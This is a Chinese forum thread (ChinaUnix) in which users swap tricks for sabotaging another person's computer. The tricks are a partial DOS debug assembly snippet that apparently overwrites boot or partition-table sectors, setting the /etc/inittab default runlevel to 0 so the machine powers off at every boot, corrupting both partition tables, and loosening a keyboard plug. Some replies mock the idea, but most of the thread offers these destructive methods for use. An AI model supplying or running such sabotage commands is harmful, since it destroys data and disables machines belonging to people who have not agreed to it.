免费注册 查看新帖 |

Chinaunix

平台 论坛 博客 文库
最近访问板块 发新帖
楼主: yang19830424

请教一个卑鄙问题~ [复制链接]

论坛徽章:
61 [报告]

嘿嘿

把你的内存条在地上蹭蹭就行了~~挖哈哈~~~

论坛徽章:
62 [报告]
原帖由 platinum 于 2006-1-5 08:56 发表
呵呵,再来一个
[code]
备份
debug
-a
mov ax,240
mov bx,200
mov cx,1
mov dx,80
int 13
int 3

-g=100
-rbx
:0

-rcx
:8000

-na:boot.dat
-w200
-f200 ffff f6
-a100
mov ax,340
mov  ...

典型的助纣为孽

论坛徽章:
63 [报告]
看来我是希里胡图地学了一年汇编了

论坛徽章:
64 [报告]

嘿嘿

我们是害虫~~~我们是害虫~~

论坛徽章:
65 [报告]
相当小人。

论坛徽章:
66 [报告]

修改文件/etc/inittab

把默认的运行级别改成0.这样一开机后就关机.修复也容易,进单用户模式,把/etc/inittab的运行级别改回来就可以了.

论坛徽章:
67 [报告]

movno1

呵呵!太好笑了!哈哈!都是一个比一个牛啊!

论坛徽章:
2015年迎新春徽章
日期:2015-03-03 17:23:07综合交流区版块每日发帖之星
日期:2015-08-19 06:20:00综合交流区版块每日发帖之星
日期:2015-09-15 06:20:00
68 [报告]
这么久了,还有人顶起来。
再看了一遍,这帖还行。

版主不如编辑一下标题,来个推荐精华吧。

论坛徽章:
69 [报告]
不够完善, 默认的分区表是2张,除了默认用的一张外,还有张是备用的. (这也就是为什么分区表坏了还可以无备份恢复过来的原因),如果要下手狠,最好2张表一起改.

论坛徽章:
70 [报告]

回复 66楼 sery 的帖子

其实要是对付入门的人来说吧,不用那么麻烦地
把键盘线的插头松动一下,似连没连的就行了,开机之后吧蜂鸣器还能滴滴滴的响,然后黑屏,啥都不显示,估计要是入门级的人来说可能就吓坏了,“哇,我咋把他电脑弄坏了呢。。。。”然后忐忑不安中
估计这人也不会是什么君子,然后看一下,哈,四下无人,赶紧关闭电源,走人。。。然后还要留意你发现电脑“坏了”之后的表现,要是你“大度”不追究,他就谢天谢地了。。。
估计以后就再也不敢碰你电脑了!

不过切忌,你把键盘插紧上机的时候不能让他看见,挖哈哈,这个主意怎么样?